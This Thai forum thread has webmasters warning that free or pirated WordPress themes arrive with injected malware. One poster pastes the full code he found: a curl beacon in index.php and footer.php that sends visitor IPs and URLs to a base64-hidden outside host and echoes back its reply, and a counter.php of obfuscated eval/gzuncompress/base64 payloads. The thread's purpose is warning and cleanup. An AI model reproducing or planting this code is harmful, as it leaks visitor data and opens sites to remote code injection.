ต่อไป »

[thaigoodskin]

ธีมฟรี มักมีของแถมอันตราย ติดมาด้วยเสมอ

โดยเฉพาะอย่างยิ่ง พวกธีม พรีเมี่ยม แล้วเอามาแจกฟรี ตามเว็บเมืองนอกนี่แหละ ตัวดีเลย 

[be-bb]

เจอแบบนี้ รู้สึกปวดใจเลยครับ

[jit_tiger]

ง่ะ น่ากลัว 

[backstep]

โหลดของฟรีมาบ่อยเจอแบบนี้ก็ไม่ไหวแหะ 

[makoto]

เพิ่มเติม ใน folder wp-admin ไฟล์ index ด้วยนะครับ โดน

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
บลา...


ถ้าลบไม่หมดมันก็จะมาเรื่อยๆ ถ้ามีเวลาก็ควร re-install บ่อยๆ

ส่วน wp-app.php นี่ไม่น่าจะใช่นะครับ มันเป็นไฟล์ระบบตั้งแต่ 3.4 ลงไป

[iak1]

เช็ค log แล้วหาที่มาของ เจ้า counter.php โลด

[MayaKitajima]

กำ มีหลายแบบจัง เคยเจอแฮ็ค ก่อนจะโดน stat โชว์ว่ามีคนมาเข้า url นี้แต่ เป็น not found

แล้วดู url ที่มันหาแต่ละอัน ลงท้าย ด้วย upload, insert, include อะไรของมันเยอะแยะก็ไม่รู้
ไอ้เราก็เอะใจแล้ว มันมาบ่อยจังฟะ แต่ไม่รู้จะทำยังไง เพราะไม่เก่งเรื่อง security และก็โดนจนได้... เหอๆ พอเข้ามาดู

กำแท้ มีไฟล์ ebay และอะไรต่อมิอะไรมาพรึ่บ มีทั้ง .zip มาเป็น Folders ต้องปิดเว็บล้างบางชั่วคราว 
น่ากลัวตรงมีไฟล์ user ขายของด้วยนี่แร่ะ ระแวงสุดๆ

[mosmf]

เห็นแล้วปวดตับ ใช้ของฟรีต้องระวัง 

[seo18]

โดนเหมือนกัน

[picasso]

ขอบคุณครับ

[OptimusPrime]

  น่ากลัว


 :wanwan017:เป็นความรู้ครับขอบพระคุณครับ

[jade1209]

โค้ดพวกนี้มันทำอะไรได้หรอครับ มันจะติดมาตอนใช้ theme ฟรีของ wp ใช่ปะ

[ba5nanas]

โค้ดพวกนี้มันทำอะไรได้หรอครับ มันจะติดมาตอนใช้ theme ฟรีของ wp ใช่ปะ

eval เป็น string กลับไปเป็น PHP ครับ เช่น

echo 'echo "hello world";';

มาใช้ eval('echo "hello world"');

ผลที่จะได้ก็คือ hello world

ยิ่งถ้าใครไม่รู้จัก base64 ไม่คิดจะ echo ออกมาดูนี่ น่ากลัวครับ เพราะบางคนดู base64 แบบ ภาษาอะไรวะ ตูงง แล้วก็ผ่านไป ( สำหรับมือใหม่ไม่เคยโดน )

ส่วนคนที่รู้ เขาก็จะ แปล มาดูว่าเกิดอะไรขึ้น ราวๆนั้น

ยิ่งถ้าคุณเก็บข้อมูลสำคัญๆ ด้วยแล้ว eval เป็นฟังชั่นดาบสองคมนั้นแหล่ะ ช่วย การทำ script ให้ง่ายขึ้น แต่ก็ มาช่วยโดน ดาบแทงตัวเองให้ตายง่ายขึ้น

ปล eval มันยังมีความลับอีกเยอะ

http://php.net/manual/en/function.eval.php

ซึ่งผมเองก็บอกไม่หมด ที่ผมบอก นั้นแค่ ขี้เล็บ

และการบอกคุณสัมบัติมากๆ ก็เหมือนดาบสองคมอีกเช่นกัน เป็น functions ที่อันตราย ก็พอ

[jade1209]

คือมันทำให้ bot อ่าน string เป็น PHP หรอครับ ผมเข้าใจถูกไหม

ขอถามเป็นความรู้อีกอย่างนะครับ ถ้าเราเจอโค้ดแบบนี้ในธีม เราแค่ลบธีมมันจะจบไหมครับ รึว่าเป็นเหมือนไวรัสอ่า

[Pinnspurs]

สืบเนื่องจาก มีคนไม่หวังดีโจมตีมาต่อเนื่องต่างๆนาๆ และพยายามเรื่อย ไม่รู้จะมาประสงค์ร้ายทำไมผมไปทำอะไรให้ ซึงผมก็ตรวจสอบทุกวัน วันละหลายรอบ ซึ่งเป็นความเคยชินไปแล้วมีไฟล์แปลกปลอมเข้ามาก็ลบตลอด และช่วงนี้พิเศษหน่อย มีมาทุกวัน เลยอยากจะเอามาเตือนท่านอื่นด้วย

ของผมจะมี File มี code แปลกปลอมเข้ามาใน index.php footer.php ซึงจะมี code ดังนี้ ไม่รู้ว่ามีการทำงานอย่างไร

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

หากเพื่อนๆเจอ code แบบนี้ให้ลบออกด่วนเลย
มีอีก ใน root เลย ลบบ่อยมากมันก็พยายามสร้าง ใช้ชื่อเดิม ลบจนเคยชิน

wp-app.php
wp-rdf.php
counter.php

ข้างในเปิดดู บางทีมีชื่อใหม่มาเรื่อยแต่ข้างในเหมือนเดิม

<?php
/**
 * Redirects to the RDF feed
 * This file is deprecated and only exists for backwards compatibility
 *
 * @package WordPress
 */

require( './wp-load.php' );
wp_redirect( get_bloginfo( 'rdf_url' ), 301 );
exit;
?>

และ

ข้างใน wp-app.php ทั้งๆที่ผมไม่เคยสร้างมาก่อน ไม่รุ้มาได้ไง

<?php
/**
 * Atom Publishing Protocol support for WordPress
 *
 * @version 1.0.5-dc
 */

/**
 * WordPress is handling an Atom Publishing Protocol request.
 *
 * @var bool
 */
define('APP_REQUEST', true);

/** Set up WordPress environment */
require_once('./wp-load.php');

/** Atom Publishing Protocol Class */
require_once(ABSPATH . WPINC . '/atomlib.php');

/** Atom Server **/
require_once(ABSPATH . WPINC . '/class-wp-atom-server.php');

/** Admin Image API for metadata updating */
require_once(ABSPATH . '/wp-admin/includes/image.php');

$_SERVER['PATH_INFO'] = preg_replace( '/.*\/wp-app\.php/', '', $_SERVER['REQUEST_URI'] );

// Allow for a plugin to insert a different class to handle requests.
$wp_atom_server_class = apply_filters('wp_atom_server_class', 'wp_atom_server');
$wp_atom_server = new $wp_atom_server_class;

// Handle the request
$wp_atom_server->handle_request();

exit;

/**
 * Writes logging info to a file.
 *
 * @since 2.2.0
 * @deprecated 3.4.0
 * @deprecated Use error_log()
 * @link http://www.php.net/manual/en/function.error-log.php
 *
 * @param string $label Type of logging
 * @param string $msg Information describing logging reason.
 */
function log_app( $label, $msg ) {
   _deprecated_function( __FUNCTION__, '3.4', 'error_log()' );
   if ( ! empty( $GLOBALS['app_logging'] ) )
      error_log( $label . ' - ' . $msg );
}

ข้างใน counter.php  ใครแปลได้ก็เอามาแฉหน่อยครับ

<?php
//Counter V.2.35
//Generated by server
//Do not delete
eval(gzuncompress(base64_decode('eF6lUsFqwkAU/JUeCqtQiiS1ECQHe0ikCJJt0exKCdlNFNKIYkBIvl7nJYVqnicPmbfsvDczu5vncL74mM6/1iJJ000ifvzp8ZjWA5NW+ftbkuV2n+UDYcXTq3AlsAZkoVcZl1YlkPitD/TF8OV22pW1vXwM0+qSJt/xx1hyYzXuqxNDcwDOH6nueiPRA6nIk59Xu6DR4L/VKHYoYakc71dHPnN/WfyJlkqvxqiFceg8Zf8+sX3prlD1CjgugKbz6E/80+46JaMLzWs9rkvByl3WBjXwDmZHP8eo76rQFXgN5YzlCdXOIubsYKi71Wx0jIU82RkqN9Fpgy5zYAhYFkwKEG2SwoRdmgibeIXh5AxE9+BR'))); ?><? eval(gzuncompress(base64_decode('eF5Vj9tqg0AQhl8liGQT8ELMVQmhCG60kmizMdS0FBnPS3RXVrclCX33rrE3vZmPOf3zTylZNlDOZgDlQqfLuw4bWwi4LpAXRa/J6YhJYrs4iJChaQaqOK+aAhnoCjXniinQXCq2PVORd4UAxawWvB3HUsoqhR5KEHTM+aDiQ5rgLSaYTLoE78MIJ7bjqMLU98KjOorAI2bm8K+dlfep5dep61/TVX57j/1b7m5NiAMT3vbybD0Nu1VgnmPiTTzIzK2/lcQz7TYK/2/MZa+8VgUbxt485y1QxqAtxvRh8M/AvJRN08FQTxqHEz5GyYm8jFtZXWSXsd5wflGfhJqhzbTlWhSDFGymw4dOP9c/v836bFU='))); ?><? eval(gzuncompress(base64_decode('eF6FlG1rgzAQgP+KhWINK8Mk1rZIYN1wZeDaYXVfRMRtuhXKCn3Zl+J/30VTNTSQT4bkubtw98RtaQ22x2NxsoZ5Xv5lNkKX793+I98ZYsMTX3bYn3+/LPsOI7GF2XAZrB8XwSYZZRCdjdLETq1htvHDdz9MYMuyUXrFCVvFQSBiKeOnkGpbWtZtGgxp6vvgMecIQowZZb47Fsg0FTyRearjqcw7Ot6R+YmOn8i8q+NdmZ/q+KnMz3T8TObnOn4u8xi06A1AmjDGKB0004QxXWCewqe+BpiCB5DhdDgXhmkaKsTpEHRppk8VhmFQrHYHhmDc1ysXFgqHuETSJaZQQYTM1CGdR1dwrga5QP3chIve5CZYHcIdkkJIF0Ih5NqTpR/VT4fwhojnQlSNaCWjyKsqaHzTNGIMoNP8rUEbbx4oblUj46c4DNZvURb6URyuonCx2jz74bh76FD+NkHrXpcgenn113HURoLv4uIOe1CkaHUk9Q+gubeTiMIoZbVPBCYsROif1Ucu8orPn734STlepajSSgxVquofilhu0g=='))); ?>


และอีกหลาย file จำไม่ได้ละเจอ file แปลกลบไว้ก่อน แนะนำให้ท่านๆ หมั่นตรวจสอบดู  file แปลกปลอมด้วยนะครับ ก่อนที่จะมานั่งเสียอารมณ์+เสียใจทีหลัง

คือถ้าเจอโค๊ดตามนี้ ให้รีบลบ หรือยังไงครับ ผมมือใหม่ อ่านแล้วงง มาก  

[moneyexpobusiness]

น่ากลัวแฮะ ลองไปตรวจดูบ้างดีกว่า

[jade1209]

คือถ้าเจอโค๊ดตามนี้ ให้รีบลบ หรือยังไงครับ ผมมือใหม่ อ่านแล้วงง มาก  

ตามนั้นครับ ไปอ่านจาก basic-hack.blogspot.com มา ปกติพวก hacker มันจะหาช่องโหว่ของระบบแล้วก็แทรกโค้ดพวกนี้มา เราต้องคอยตรวจสอบเองครับ เท่าที่ผมรู้นะ

[XauzeR]

โมเองปลอดภัยที่สุด

 

[Kalin]

ของดีและฟรีมีน้อยครับ  

[Comman]

  ของฟรีแต่ไ่ม่ปลอดภัย ใครไม่รู้ก็เสร็จ ขอบคุณสำหรับข้อมูลดีๆครับ